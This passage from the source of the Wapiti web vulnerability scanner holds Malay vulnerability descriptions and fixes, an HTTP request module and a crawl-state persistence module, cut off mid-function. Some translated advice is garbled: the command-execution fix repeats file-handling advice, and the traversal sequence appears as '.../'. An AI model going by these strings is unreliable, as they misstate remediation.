"Untuk melindungi daripada suntikan SQL, input pengguna mestilah tidak terus dimasukkan "
"ke dalam penyata SQL. Sebaliknya, input pengguna mesti di 'escaped' atau ditapis atau "
"penyata diparameter mesti digunakan"

msgid "Commands execution description"
msgstr ""
"Serangan ini terdiri dalam melaksanakan arahan sistem pada pelayan "
"Penyerang cuba menyuntik perintah ini dalam parameter permintaan"

msgid "Commands execution solution"
msgstr "Lebih cenderung berfungsi tanpa pengguna input bila menggunakan fail sistem panggilan"

msgid "CRLF description"
msgstr ""
"Istilah CRLF merujuk kepada Carriage Return (ASCII 13, \\r) Line Feed (ASCII 10, "
"\\n). Ia digunakan untuk memaklumkan penamatan talian, Walau bagaimanapun, diuruskan "
"berbeza dalam sistem operasi popular hari ini. Sebagai contoh: dalam Windows "
"kedua-dua CR dan LF perlu ambil perhatian akhir garisan, manakala dalam Linux/"
"UNIX LF yang hanya diperlukan. Kombinasi ini CR dan LR digunakan untuk "
"contoh apabila menekan 'Enter' pada papan kekunci. Bergantung pada aplikasi "
"digunakan, menekan 'Enter' pada amnya mengarahkan aplikasi untuk memulakan sebuah "
"baris baru, atau untuk menghantar perintah."

msgid "CRLF solution"
msgstr ""
"Semak parameter dihantar dan tidak membenarkan CRLF yang akan disuntik oleh "
"penapisan CRLF"

msgid "Cross Site Scripting description"
msgstr ""
"Serangan injeksi code pada laman (XSS) adalah jenis kelemahan keselamatan komputer "
"biasanya didapati dalam aplikasi web yang membolehkan suntikan kod oleh "
"pengguna web yang berniat jahat ke dalam laman web yang dilihat oleh pengguna web lain. Contoh-contoh Kod "
"termasuk skrip kod HTML dan skrip klien."

msgid "Cross Site Scripting solution"
msgstr ""
"Cara terbaik untuk melindungi aplikasi web yang daripada serangan XSS adalah memastikan bahawa "
"aplikasi melaksanakan pengesahan semua pengepala, cookies, rentetan pertanyaan, "
"medan borang, dan medan-medan yang tersembunyi. Pengguna pengekodan dibekalkan output dalam pelayan "
"boleh juga mengalahkan kelemahan XSS dengan menghalang skrip yang dimasukkan dari "
"dihantar kepada pengguna dalam bentuk yang boleh dilaksanakan. Aplikasi boleh mendapat "
"perlindungan ketara daripada javascript berdasarkan serangan dengan menukar "
"aksara berikut di semua output yang dihasilkan dengan entiti HTML yang sesuai "
"pengekodan: <, >, &, ", ', (, ), #, %, ; , +, -."

msgid "File Handling description"
msgstr ""
"Serangan ini adalah juga dikenali sebagai laluan Transversal atau Transversal direktori, dimana "
"matlamatnya adalah akses kepada fail-fail dan direktori yang disimpan di luar web "
"asas direktori. Penyerang cuba meneroka direktori yang disimpan dalam web "
"pelayan. Penyerang menggunakan beberapa teknik, sebagai contoh, memanipulasi "
"pembolehubah rujukan fail dengan ' dot-dot-slash (.../)' urutan dan "
"variasi untuk bergerak ke direktori asas untuk mengemudi sistem fail ini"

msgid "File Handling solution"
msgstr ""
"Lebih cenderung berfungsi tanpa input dari pengguna bila menggunakan fail sistem panggilan.Mengguna "
"indeks daripada bahagian sebenar fail nama apabila membuat 'templating' atau menggunakan "
"fail bahasa (cth: nilai 5 dari pilihan pengguna = Czechoslovakian, "
"bukannya mengharapkan pengguna untuk kembali 'Czechoslovakian'). Memastikan "
"pengguna tidak boleh membekalkan semua bahagian laluan - mengelilingi ia dengan kod laluan anda. "
"Mengesahkan input pengguna dengan hanya menerima yang diketahui baik - jangan membetulkan "
"data. Gunakan 'chrooted jails' dan kod akses polisi untuk menyekat di mana"
"fail boleh diperolehi atau disimpan."

msgid "Htaccess bypass description"
msgstr ""
"Fail htaccess digunakan untuk menyekat akses ke beberapa fail atau kaedah HTTP. Dalam "
"sesetengah kes mungkin untuk memintas sekatan ini dan mengakses fail."

msgid "Htaccess bypass solution"
msgstr "Pastikan setiap kaedah HTTP adalah dilarang jika kelayakan yang buruk."

msgid "Internal server error description"
msgstr "Ralat telah berlaku pada bahagian pelayan, dimana mencegah proses permintaan. Ia mungkin tanda kelemahan"

msgid "Internal server error solution"
msgstr "Maklumat lanjut mengenai ralat perlu dicari dalam log pelayan."

msgid "Potentially dangerous file description"
msgstr "Fail yang berpotensi mempunyai kelemahan telah ditemui di laman web."

msgid "Potentially dangerous file solution"
msgstr "Pastikan skrip dikemaskini dan menghadkan capaian sekiranya boleh."

msgid "Resource consumption description"
msgstr "Ia mengambil masa yang tidak normal ke pelayan untuk membalas pertanyaan. Penyerang mungkin memanfaatkan kelemahan untuk memuat (overload) pelayan jenis ini."

msgid "Resource consumption solution"
msgstr "Skrip terlibat mungkin menggunakan sumber pelayan (CPU, memori, rangkaian, capaian fail...) dengan cara yang tidak efisyen."

msgid "SQL Injection description"
msgstr ""
"suntikan kelemahan SQL ini membolehkan penyerang untuk mengubah pertanyaan yang dilaksanakan pada bahagian belakang pangkalan data. "
"Penyerang kemudian mungkin dapat ekstrak atau mengubah suai maklumat yang disimpan dalam pangkalan data atau meningkatkatkan keistimewaan (privileges) pada sistem."

msgid "SQL Injection solution"
msgstr ""
"Untuk melindungi daripada suntikan SQL, input pengguna mestilah tidak secara langsung dimasukkan "
"ke dalam penyata SQL. Sebaliknya, input pengguna mesti 'escaped' atau ditapis atau "
"penyata diparameter mesti digunakan"

wapiti-2.3.0+dfsg/wapitiCore/net/
wapiti-2.3.0+dfsg/wapitiCore/net/HTTP.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# This file is part of the Wapiti project (http://wapiti.sourceforge.net)
# Copyright (C) 2008-2013 Nicolas Surribas
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
import urllib
import urlparse
import socket
import os
import cgi
import requests
import datetime
from wapitiCore.net import jsoncookie
from copy import deepcopy


def shell_escape(s):
    # Backslash-escape the characters that remain special inside a
    # double-quoted shell string (used to build the cURL representation).
    s = s.replace('\\', '\\\\')
    s = s.replace('"', '\\"')
    s = s.replace('$', '\\$')
    s = s.replace('!', '\\!')
    s = s.replace('`', '\\`')
    return s


class HTTPResource(object):
    _method = "GET"
    _encoding = "ISO-8859-1"
    _hostname = ""
    _resource_path = ""
    _file_path = ""
    _status = 0
    _headers = {}
    _referer = ""
    _start_time = None
    _elapsed_time = None
    _port = 80

    # Most of the members of a HTTPResource object are immutable so we compute
    # the data only one time (when asked for) and we keep it in memory for less
    # calculations in those "cached" vars.
    _cached_url = None
    _cached_get_keys = None
    _cached_post_keys = None
    _cached_file_keys = None
    _cached_encoded_params = None
    _cached_encoded_data = None
    _cached_encoded_files = None
    _cached_hash = None

    # eg: get = [['id', '25'], ['color', 'green']]
    _get_params = []

    # same structure as _get_params
    _post_params = []

    # eg: files = [['file_field', ('file_name', 'file_content')]]
    _file_params = []

    def __init__(self, path, method="", get_params=None, post_params=None,
                 encoding="UTF-8", referer="", file_params=None):
        """Create a new HTTPResource object.

        Takes the following arguments:
            path : The path of the HTTP resource on the server. It can contain a query string.
            get_params : A list of key/value parameters (each one is a list of two strings).
                         Each string should already be urlencoded in the good encoding format.
            post_params : Same structure as above but specify the parameters sent in the HTTP body.
            file_params : Same as above except the values are a tuple (filename, file_content).
            encoding : A string specifying the encoding used to send data to this URL.
                       Don't mistake it with the encoding of the webpage pointed out by the HTTPResource.
            referer : The URL from which the current HTTPResource was found.
        """
        self._resource_path = path

        if post_params is None:
            self._post_params = []
        elif isinstance(post_params, list):
            self._post_params = deepcopy(post_params)
        elif isinstance(post_params, basestring):
            self._post_params = []
            if len(post_params):
                for kv in post_params.split("&"):
                    if kv.find("=") > 0:
                        self._post_params.append(kv.split("=", 1))
                    else:
                        # ?param without value
                        self._post_params.append([kv, None])

        if file_params is None:
            self._file_params = []
        elif isinstance(file_params, list):
            self._file_params = deepcopy(file_params)
        else:
            self._file_params = file_params

        if get_params is None:
            self._get_params = []
            if "?" in self._resource_path:
                query_string = urlparse.urlparse(self._resource_path).query
                for kv in query_string.split("&"):
                    if kv.find("=") > 0:
                        self._get_params.append(kv.split("=", 1))
                    else:
                        # ?param without value
                        self._get_params.append([kv, None])
                self._resource_path = self._resource_path.split("?")[0]
        elif isinstance(get_params, list):
            self._get_params = deepcopy(get_params)
        else:
            self._get_params = get_params

        if not method:
            # For lazy
            if self._post_params or self._file_params:
                self._method = "POST"
            else:
                self._method = "GET"
        else:
            self._method = method
        self._encoding = encoding
        self._referer = referer
        parsed = urlparse.urlparse(self._resource_path)
        self._file_path = parsed.path
        self._hostname = parsed.netloc
        if parsed.port is not None:
            self._port = parsed.port
        elif parsed.scheme == "https":
            self._port = 443

    def __hash__(self):
        if self._cached_hash is None:
            get_kv = tuple([tuple(param) for param in self._get_params])
            post_kv = tuple([tuple(param) for param in self._post_params])
            file_kv = tuple([tuple([param[0], param[1][0]]) for param in self._file_params])

            self._cached_hash = hash((self._method, self._resource_path,
                                      get_kv, post_kv, file_kv))
        return self._cached_hash

    def __eq__(self, other):
        if not isinstance(other, HTTPResource):
            return NotImplemented

        if self._method != other._method:
            return False

        if self._resource_path != other._resource_path:
            return False

        return hash(self) == hash(other)

    def __lt__(self, other):
        if not isinstance(other, HTTPResource):
            return NotImplemented
        if self.url < other.url:
            return True
        else:
            if self.url == other.url:
                return self.encoded_data < other.encoded_data
            return False

    def __le__(self, other):
        if not isinstance(other, HTTPResource):
            return NotImplemented
        if self.url < other.url:
            return True
        elif self.url == other.url:
            return self.encoded_data <= other.encoded_data
        return False

    def __ne__(self, other):
        if not isinstance(other, HTTPResource):
            return NotImplemented

        if self.method != other.method:
            return True

        if self._resource_path != other._resource_path:
            return True

        return hash(self) != hash(other)

    def __gt__(self, other):
        if not isinstance(other, HTTPResource):
            return NotImplemented
        if self.url > other.url:
            return True
        elif self.url == other.url:
            return self.encoded_data > other.encoded_data
        return False

    def __ge__(self, other):
        if not isinstance(other, HTTPResource):
            return NotImplemented
        if self.url > other.url:
            return True
        elif self.url == other.url:
            return self.encoded_data >= other.encoded_data
        return False

    def _encoded_keys(self, params):
        quoted_keys = []
        for k, __ in params:
            quoted_keys.append(urllib.quote(k, safe='%'))
        return "&".join(quoted_keys)

    def __repr__(self):
        buff = ""
        if self._get_params:
            buff = "%s %s" % (self._method, self.url)
        else:
            buff = "%s %s" % (self._method, self._resource_path)
        if self._post_params:
            buff += "\n\tdata = %s" % (self.encoded_data)
        if self._file_params:
            buff += "\n\tfiles = %s" % (self.encoded_files)
        return buff

    @property
    def http_repr(self):
        rel_url = self.url.split('/', 3)[3]
        http_string = "%s /%s HTTP/1.1\nHost: %s\n" % (self._method, rel_url, self._hostname)
        if self._referer:
            http_string += "Referer: %s\n" % (self._referer)
        if self._file_params:
            boundary = "------------------------boundarystring"
            http_string += "Content-Type: multipart/form-data; boundary=%s\n\n" % (boundary)
            for field_name, field_value in self._post_params:
                http_string += ("{0}\nContent-Disposition: form-data; "
                                "name=\"{1}\"\n\n{2}\n").format(boundary, field_name, field_value)
            for field_name, field_value in self._file_params:
                http_string += ("{0}\nContent-Disposition: form-data; name=\"{1}\"; filename=\"{2}\"\n\n"
                                "/* snip file content snip */\n").format(boundary, field_name, field_value[0])
            http_string += "{0}--\n".format(boundary)
        elif self._post_params:
            http_string += "Content-Type: application/x-www-form-urlencoded\n"
            http_string += "\n%s" % (self.encoded_data)
        return http_string

    @property
    def curl_repr(self):
        curl_string = "curl \"{0}\"".format(shell_escape(self.url))
        if self._referer:
            curl_string += " -e \"{0}\"".format(shell_escape(self._referer))
        if self._file_params:
            for field_name, field_value in self._post_params:
                curl_string += " -F \"{0}\"".format(shell_escape("{0}={1}".format(field_name, field_value)))
            for field_name, field_value in self._file_params:
                curl_upload_kv = "{0}=@your_local_file;filename={1}".format(field_name, field_value[0])
                curl_string += " -F \"{0}\"".format(shell_escape(curl_upload_kv))
            pass
        elif self._post_params:
            curl_string += " -d \"{0}\"".format(shell_escape(self.encoded_data))
        return curl_string

    def setHeaders(self, response_headers):
        """Set the HTTP headers received while requesting the resource"""
        self._headers = response_headers

    def setStartTime(self):
        self._start_time = datetime.datetime.utcnow()

    def setElapsedTime(self):
        """Store the time taken for obtaining a response to the request."""
        self._elapsed_time = datetime.datetime.utcnow() - self._start_time

    @property
    def start_time(self):
        return self._start_time

    @property
    def elapsed_time(self):
        return self._elapsed_time

    @property
    def url(self):
        if self._cached_url is None:
            if self._get_params:
                self._cached_url = "{0}?{1}".format(self._resource_path,
                                                    self._encode_params(self._get_params))
            else:
                self._cached_url = self._resource_path
        return self._cached_url

    @property
    def hostname(self):
        return self._hostname

    @property
    def port(self):
        return self._port

    @property
    def path(self):
        return self._resource_path

    @property
    def file_path(self):
        return self._file_path

    @property
    def file_ext(self):
        return os.path.splitext(self.file_path)[1]

    @property
    def file_name(self):
        return os.path.basename(self.file_path)

    @property
    def method(self):
        return self._method

    @property
    def encoding(self):
        return self._encoding

    @property
    def headers(self):
        return self._headers

    @property
    def referer(self):
        return self._referer

    # To prevent errors, always return a deepcopy of the internal lists
    @property
    def get_params(self):
        return deepcopy(self._get_params)

    @property
    def post_params(self):
        return deepcopy(self._post_params)

    @property
    def file_params(self):
        return deepcopy(self._file_params)

    def _encode_params(self, params):
        if not params:
            return ""

        key_values = []
        for k, v in params:
            k = urllib.quote(k, safe='%')
            if v is None:
                key_values.append(k)
            else:
                if isinstance(v, tuple) or isinstance(v, list):
                    # for upload fields
                    v = v[0]
                v = urllib.quote(v, safe='%')
                key_values.append("%s=%s" % (k, v))
        return "&".join(key_values)

    @property
    def encoded_params(self):
        return self._encode_params(self._get_params)

    @property
    def encoded_data(self):
        """Return a raw string of key/value parameters for POST requests"""
        return self._encode_params(self._post_params)

    @property
    def encoded_files(self):
        return self._encode_params(self._file_params)

    @property
    def encoded_get_keys(self):
        if self._cached_get_keys is None:
            self._cached_get_keys = self._encoded_keys(self._get_params)
        return self._cached_get_keys

    @property
    def encoded_post_keys(self):
        if self._cached_post_keys is None:
            self._cached_post_keys = self._encoded_keys(self._post_params)
        return self._cached_post_keys

    @property
    def encoded_file_keys(self):
        if self._cached_file_keys is None:
            self._cached_file_keys = self._encoded_keys(self._file_params)
        return self._cached_file_keys


class HTTPResponse(object):
    resp = None

    def __init__(self, requests_resp, peer, timestamp):
        self.resp = requests_resp
        self.peer = peer
        self.timestamp = timestamp

    def getPage(self):
        "Return the content of the page in unicode."
        if self.resp.encoding:
            return self.resp.text
        else:
            return self.resp.content

    def getRawPage(self):
        "Return the content of the page in raw bytes."
        return self.resp.content

    def getCode(self):
        "Return the HTTP Response code."
        return str(self.resp.status_code)

    def getHeaders(self):
        "Return the HTTP headers of the Response."
        return self.resp.headers

    def getPageCode(self):
        "Return a tuple of the content and the HTTP Response code."
        return (self.getPage(), self.getCode())

    def getEncoding(self):
        "Return the detected encoding for the page."
        return self.resp.encoding

    def setEncoding(self, new_encoding):
        "Change the encoding (for getPage())"
        self.resp.encoding = new_encoding

    def getPeer(self):
        """Return the network address of the server that delivered this Response.
        This will always be a socket_object.getpeername() return value, which is
        normally a (ip_address, port) tuple."""
        return self.peer

    def getTimestamp(self):
        """Return a datetime.datetime object describing when this response was
        received."""
        return self.timestamp


class HTTP(object):
    proxies = {}
    auth_credentials = []
    auth_method = "basic"
    timeout = 6.0
    h = None
    cookiejar = {}
    server = ""
    verify_ssl = True

    configured = 0

    def __init__(self, server):
        self.h = requests.Session()
        for adapter_protocol in self.h.adapters:
            self.h.adapters[adapter_protocol].max_retries = 1
        self.server = server

    def send(self, target, method="", get_params=None, post_params=None, file_params=None, headers={}):
        "Send a HTTP Request. GET or POST (if post_params is set)."
        resp = None
        _headers = {}
        _headers.update(headers)

        get_data = None
        if isinstance(get_params, basestring):
            get_data = get_params
        elif isinstance(get_params, list):
            get_data = self.encode(get_params)

        post_data = None
        if isinstance(post_params, basestring):
            post_data = post_params
        elif isinstance(post_params, list):
            post_data = self.encode(post_params)

        file_data = None
        if isinstance(file_params, tuple) or isinstance(file_params, list):
            file_data = file_params

        if isinstance(target, HTTPResource):
            if get_data is None:
                get_data = target.get_params

            target.setStartTime()
            if target.method == "GET":
                resp = self.h.get(target.url, headers=_headers, timeout=self.timeout,
                                  allow_redirects=False, verify=self.verify_ssl)
            else:
                if target.referer:
                    _headers.update({'referer': target.referer})
                if post_data is None:
                    post_data = target.post_params
                if file_data is None:
                    file_data = target.file_params
                if target.method == "POST":
                    if not file_data:
                        _headers.update({'content-type': 'application/x-www-form-urlencoded'})
                    resp = self.h.post(target.path, params=get_data, data=post_data, files=file_data,
                                       headers=_headers, timeout=self.timeout,
                                       allow_redirects=False, verify=self.verify_ssl)
                else:
                    resp = self.h.request(target.method, target.path, params=get_data, data=post_data,
                                          files=file_data, headers=_headers, timeout=self.timeout,
                                          allow_redirects=False, verify=self.verify_ssl)
            target.setElapsedTime()
            target.setHeaders(resp.headers)

        if resp is None:
            return None
        return HTTPResponse(resp, "", datetime.datetime.now())

    def quote(self, url):
        "Encode a string with hex representation (%XX) for special characters."
        return urllib.quote(url)

    def encode(self, params_list):
        "Encode a sequence of two-element lists or dictionary into a URL query string."
        encoded_params = []
        for k, v in params_list:
            # not safe: '&=#' with of course quotes...
            k = urllib.quote(k, safe='/%[]:;$()+,!?*')
            v = urllib.quote(v, safe='/%[]:;$()+,!?*')
            encoded_params.append("%s=%s" % (k, v))
        return "&".join(encoded_params)

    def uqe(self, params_list):  # , encoding = None):
        "urlencode a string then interpret the hex characters (%41 will give 'A')."
        return urllib.unquote(self.encode(params_list))  # , encoding))

    def escape(self, url):
        "Change special characters in their html entities representation."
        return cgi.escape(url, quote=True).replace("'", "%27")

    def setTimeOut(self, timeout=6.0):
        "Set the time to wait for a response from the server."
        self.timeout = timeout
        socket.setdefaulttimeout(self.timeout)

    def getTimeOut(self):
        "Return the timeout used for HTTP requests."
        return self.timeout

    def setVerifySsl(self, verify=True):
        "Set whether SSL must be verified."
        self.verify_ssl = verify

    def setProxy(self, proxy=""):
        "Set a proxy to use for HTTP requests."
        url_parts = urlparse.urlparse(proxy)
        protocol = url_parts.scheme
        host = url_parts.netloc
        if protocol in ["http", "https"]:
            if host:
                self.proxies[protocol] = "%s://%s/" % (protocol, host)
        self.h.proxies = self.proxies

    def setCookieFile(self, cookie):
        "Load session data from a cookie file"
        if os.path.isfile(cookie):
            jc = jsoncookie.jsoncookie()
            jc.open(cookie)
            self.cookiejar = jc.cookiejar(self.server)
            self.h.cookies = self.cookiejar
            jc.close()

    def setAuthCredentials(self, auth_credentials):
        "Set credentials to use if the website require an authentication."
        self.auth_credentials = auth_credentials
        # Force reload
        self.setAuthMethod(self.auth_method)

    def setAuthMethod(self, auth_method):
        "Set the authentication method to use for the requests."
        self.auth_method = auth_method
        if len(self.auth_credentials) == 2:
            username, password = self.auth_credentials
            if self.auth_method == "basic":
                from requests.auth import HTTPBasicAuth
                self.h.auth = HTTPBasicAuth(username, password)
            elif self.auth_method == "digest":
                from requests.auth import HTTPDigestAuth
                self.h.auth = HTTPDigestAuth(username, password)
            elif self.auth_method == "ntlm":
                from requests_ntlm import HttpNtlmAuth
                self.h.auth = HttpNtlmAuth(username, password)
        elif self.auth_method == "kerberos":
            from requests_kerberos import HTTPKerberosAuth
            self.h.auth = HTTPKerberosAuth()


if __name__ == "__main__":
    res1 = HTTPResource("http://httpbin.org/post?var1=a&var2=b",
                        post_params=[['post1', 'c'], ['post2', 'd']])
    res2 = HTTPResource("http://httpbin.org/post?var1=a&var2=z",
                        post_params=[['post1', 'c'], ['post2', 'd']])
    res3 = HTTPResource("http://httpbin.org/post?var1=a&var2=b",
                        post_params=[['post1', 'c'], ['post2', 'z']])
    res4 = HTTPResource("http://httpbin.org/post?var1=a&var2=b",
                        post_params=[['post1', 'c'], ['post2', 'd']])
    res5 = HTTPResource("http://httpbin.org/post?var1=z&var2=b",
                        post_params=[['post1', 'c'], ['post2', 'd']])
    res6 = HTTPResource("http://httpbin.org/post?var3=z&var2=b",
                        post_params=[['post1', 'c'], ['post2', 'd']])
    res7 = HTTPResource("http://httpbin.org/post?var1=z&var2=b&var4=e",
                        post_params=[['post1', 'c'], ['post2', 'd']])
    res8 = HTTPResource("http://httpbin.org/post?var1=z&var2=d",
                        post_params=[['post1', 'c'], ['post2', 'd']])
    res10 = HTTPResource("http://httpbin.org/post?qs0",
                         post_params=[['post1', 'c'], ['post2', 'd']])
    res11 = HTTPResource("http://httpbin.org/post?qs1",
                         post_params=[['post1', 'c'], ['post2', 'd']])
    res12 = HTTPResource("http://httpbin.org/post?qs1",
                         post_params=[['post1', 'c'], ['post2', 'd']],
                         file_params=[['file1', ['fname1', 'content']], ['file2', ['fname2', 'content']]])

    assert res1 < res2
    assert res2 > res3
    assert res1 < res3
    assert res1 == res4
    assert res1 != res2
    assert res2 >= res1
    assert res1 <= res3
    print "=== Basic representation follows ==="
    print res1
    print "=== cURL representation follows ==="
    print res1.curl_repr
    print "=== HTTP representation follows ==="
    print res1.http_repr
    print "=== POST parameters as an array ==="
    print res1.post_params
    print "=== POST keys encoded as string ==="
    print res1.encoded_post_keys
    print "=== Upload HTTP representation ==="
    print res12.http_repr
    print "=== Upload basic representation ==="
    print res12
    print "=== Upload cURL representation ==="
    print res12.curl_repr
    print

wapiti-2.3.0+dfsg/wapitiCore/net/__init__.py
wapiti-2.3.0+dfsg/wapitiCore/net/crawlerpersister.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# This file is part of the Wapiti project (http://wapiti.sourceforge.net)
# Copyright (C) 2009-2013 Nicolas Surribas
#
# Original authors :
# David del Pozo
# Alberto Pastor
# Copyright (C) 2008 Informatica Gesfor
# ICT Romulus (http://www.ict-romulus.eu)
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
import os
from xml.parsers import expat
from xml.dom.minidom import Document
from urllib import quote, unquote
from wapitiCore.net import HTTP


class CrawlerPersister(object):
    """
    This class handles the persistence tasks for saving the crawler parameters
    in order to be able to continue the process in the future.
    """

    CRAWLER_DATA_DIR_NAME = "scans"
    HOME_DIR = os.getenv('HOME') or os.getenv('USERPROFILE')
    BASE_DIR = os.path.join(HOME_DIR, ".wapiti")
    CRAWLER_DATA_DIR = os.path.join(BASE_DIR, CRAWLER_DATA_DIR_NAME)

    ROOT_URL = "rootURL"
    TO_BROWSE = "toBrowse"
    BROWSED = "browsed"
    RESOURCE = "resouce"
    METHOD = "method"
    PATH = "path"
    INPUT = "input"
    INPUT_NAME = "name"
    INPUT_VALUE = "value"
    HEADERS = "headers"
    HEADER = "header"
    HEADER_NAME = "name"
    HEADER_VALUE = "value"
    ENCODING = "encoding"
    REFERER = "referer"
    GET_PARAMS = "get_params"
    POST_PARAMS = "post_params"
    FILE_PARAMS = "file_params"

    # toBrowse can contain GET and POST resources
    toBrowse = []
    # browsed contains only GET resources
    browsed = []
    # forms contains only POST resources
    forms = []
    uploads = []
    headers = {}
    rootURL = ""

    tag = ""
    array = None

    method = ""
    path = ""
    encoding = ""
    referer = ""
    get_params = []
    post_params = []
    file_params = []

    def __init__(self):
        pass

    def isDataForUrl(self, fileName):
        return os.path.exists(fileName)

    def saveXML(self, fileName):
        """
        Exports the crawler parameters to an XML file.
        @param fileName The file to which the crawler data is saved
        """
        xml = Document()
        root = xml.createElement("root")
        xml.appendChild(root)

        rootUrlEl = xml.createElement(self.ROOT_URL)
        rootUrlEl.appendChild(xml.createTextNode(self.rootURL.url))
        root.appendChild(rootUrlEl)

        # 1 - URLs and FORMs not yet browsed
        # we don't know several informations yet like the response headers
        toBrowseEl = xml.createElement(self.TO_BROWSE)
        for http_resource in self.toBrowse:
            # resource element carrying the method, path and encoding attributes
            resEl = xml.createElement(self.RESOURCE)
            resEl.setAttribute(self.METHOD, http_resource.method)
            resEl.setAttribute(self.PATH, http_resource.path)
            resEl.setAttribute(self.ENCODING, http_resource.encoding)
            # referer
            refererEl = xml.createElement(self.REFERER)
            refererEl.appendChild(xml.createTextNode(http_resource.referer))
            resEl.appendChild(refererEl)
            # GET parameters
            getParamsEl = xml.createElement(self.GET_PARAMS)
            for k, v in http_resource.get_params:
                inputEl = xml.createElement(self.INPUT)
                inputEl.setAttribute(self.INPUT_NAME, quote(k))
                if v is not None:
                    inputEl.setAttribute(self.INPUT_VALUE, quote(v))
                getParamsEl.appendChild(inputEl)
            resEl.appendChild(getParamsEl)

            # POST parameters
            postParamsEl = xml.createElement(self.POST_PARAMS)
            for k, v in http_resource.post_params:
                inputEl = xml.createElement(self.INPUT)
                inputEl.setAttribute(self.INPUT_NAME, quote(k))
                inputEl.setAttribute(self.INPUT_VALUE, quote(v))
                postParamsEl.appendChild(inputEl)
            resEl.appendChild(postParamsEl)

            # file (upload) parameters
            fileParamsEl = xml.createElement(self.FILE_PARAMS)
            for k, v in http_resource.file_params:
                inputEl = xml.createElement(self.INPUT)
                inputEl.setAttribute(self.INPUT_NAME, quote(k))
                inputEl.setAttribute(self.INPUT_VALUE, quote(v))
                fileParamsEl.appendChild(inputEl)
            resEl.appendChild(fileParamsEl)

            toBrowseEl.appendChild(resEl)
        root.appendChild(toBrowseEl)

        # 2 - URLs and FORMs already browsed
        browsedEl = xml.createElement(self.BROWSED)
        for http_resource in self.browsed:
            # resource element carrying the method, path and encoding attributes
            resEl = xml.createElement(self.RESOURCE)
            resEl.setAttribute(self.METHOD, http_resource.method)
            resEl.setAttribute(self.PATH,
                               http_resource.path)
            resEl.setAttribute(self.ENCODING, http_resource.encoding)
            # referer
            refererEl = xml.createElement(self.REFERER)
            refererEl.appendChild(xml.createTextNode(http_resource.referer))
            resEl.appendChild(refererEl)
            # GET parameters
            getParamsEl = xml.createElement(self.GET_PARAMS)
            for k, v in http_resource.get_params:
                inputEl = xml.createElement(self.INPUT)
                inputEl.setAttribute(self.INPUT_NAME, quote(k))
                if v is not None:
                    inputEl.setAttribute(self.INPUT_VALUE, quote(v))
                getParamsEl.appendChild(inputEl)
            resEl.appendChild(getParamsEl)

            # POST parameters
            postParamsEl = xml.createElement(self.POST_PARAMS)
            for k, v in http_resource.post_params:
                inputEl = xml.createElement(self.INPUT)
                inputEl.setAttribute(self.INPUT_NAME, quote(k))
                inputEl.setAttribute(self.INPUT_VALUE, quote(v))
                postParamsEl.appendChild(inputEl)
            resEl.appendChild(postParamsEl)

            # file (upload) parameters: only the file name is stored
            fileParamsEl = xml.createElement(self.FILE_PARAMS)
            for k, v in http_resource.file_params:
                inputEl = xml.createElement(self.INPUT)
                inputEl.setAttribute(self.INPUT_NAME, quote(k))
                inputEl.setAttribute(self.INPUT_VALUE, quote(v[0]))
                fileParamsEl.appendChild(inputEl)
            resEl.appendChild(fileParamsEl)

            # response headers
            headersEl = xml.createElement(self.HEADERS)
            for k, v in http_resource.headers.items():
                if v is None:
                    v = ""
                headEl = xml.createElement(self.HEADER)
                headEl.setAttribute(self.HEADER_NAME, k)
                headEl.setAttribute(self.HEADER_VALUE, v)
                headersEl.appendChild(headEl)
            resEl.appendChild(headersEl)

            browsedEl.appendChild(resEl)
        root.appendChild(browsedEl)

        f = open(fileName, "w")
        try:
            xml.writexml(f, " ", " ", "\n", "UTF-8")
        finally:
            f.close()

    def loadXML(self, fileName):
        """
        Loads the crawler parameters from an XML file.
        @param fileName The file from which the crawler data is loaded
        """
        self._parser = expat.ParserCreate("UTF-8")
        self._parser.StartElementHandler = self.__start_element
        self._parser.EndElementHandler = self.__end_element
        self._parser.CharacterDataHandler = self.__char_data
        self._parser.returns_unicode = False

        f = None
        try:
            f = open(fileName)
            content = f.read()
            self.__feed(content.replace("\n", ""))
        finally:
            if f is not None:
                f.close()

    def __feed(self, data):
        self._parser.Parse(data, 0)

    def __close(self):
        self._parser.Parse("", 1)
        del self._parser

    def __start_element(self, name, attrs):
        if name == self.TO_BROWSE:
            self.array = self.toBrowse

        elif name == self.BROWSED:
            self.array = self.browsed

        elif name == self.RESOURCE:
            self.method = attrs[self.METHOD]
            self.path = attrs[self.PATH]
            self.encoding = attrs[self.ENCODING]
            self.referer = ""
            self.headers = {}
            self.get_params = []
            self.post_params = []
            self.file_params = []

        elif name in [self.GET_PARAMS, self.POST_PARAMS, self.FILE_PARAMS, self.REFERER, self.ROOT_URL]:
            self.tag = name

        elif name == self.HEADER:
            self.headers[attrs[self.HEADER_NAME]] = attrs[self.HEADER_VALUE]

        elif name == self.INPUT:
            param_name = unquote(attrs[self.INPUT_NAME])
            if self.INPUT_VALUE in attrs:
                param_value = unquote(attrs[self.INPUT_VALUE])
            else:
                param_value = None

            if self.tag == self.GET_PARAMS:
                self.get_params.append([param_name, param_value])
            if self.tag == self.POST_PARAMS:
                self.post_params.append([param_name, param_value])
            if self.tag == self.FILE_PARAMS:
                self.file_params.append([param_name, param_value])

    def __end_element(self, name):
        if name == self.RESOURCE:
            http_res = HTTP.HTTPResource(self.path,
                                         method=self.method,
                                         encoding=self.encoding,
                                         referer=self.referer,
                                         get_params=self.get_params,
                                         post_params=self.post_params,
                                         file_params=self.file_params)
            http_res.setHeaders(self.headers)

            if self.array is self.toBrowse:
                self.toBrowse.append(http_res)
            else:
                if self.method == "GET":
